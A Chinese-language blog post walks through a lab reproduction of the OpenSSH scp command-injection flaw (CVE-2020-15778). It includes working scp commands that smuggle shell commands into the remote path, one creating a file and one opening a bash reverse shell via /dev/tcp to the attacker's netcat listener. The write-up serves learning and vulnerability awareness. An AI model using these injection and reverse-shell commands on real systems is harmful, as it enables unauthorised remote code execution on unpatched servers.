最近看好多大佬都在复现这个OpenSSH命令注入漏洞,作为菜鸡的我也要跟随大佬的脚步,也来复现一波(不分析漏洞原理,本人是菜鸡,能力不足)。再写这篇博客很不幸的我(电脑蹦了重启,写好的都没保存),不放弃继续重新来一遍。

 

 

 

介绍

2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。

 

漏洞影响版本

OpenSSH =< 8.3p1

 

漏洞复现要求

OpenSSH =< 8.3p1

需要知道ssh密码

 

搭建环境

centOS 7    IP:192.168.110.153

kali2019.4  IP:192.168.110.134

介绍一下scp命令:

 

 

 

下面开始行动:

关闭防火墙,(我没有关闭,在这里我也就不关闭了。)

查看ssh版本吧

ssh -V

 

 

首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。

scp 1.txt root@192.168.110.153:\'`touch /tmp/test.txt` /tmp\'

 

 

 

 

成功将kali上面的文件传入道centOS上面,和自己创建了文件。

 

直接进行nc反弹获取shell

先监听一个端口

nc -lvvp 7777

进行反弹shell

scp test.txt root@192.168.110.153:\'`bash -i >& /dev/tcp/192.168.110.134/7777 0>&1`/tmp/test1.txt\'

 

 

 

 

总结:该漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了。

 

改正: 

我在总结说知道ssh密码却不给登录,这个我今天复现尝试了,禁止远程登录这个命令是不行的,应该是需要做别的策略,还在继续探索中,主要修改一下自己错误的地方。

 

参考文章:OpenSSH 命令注入漏洞通告(CVE-2020-15778)

 

版权声明:本文为hcrk原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/hcrk/p/13495626.html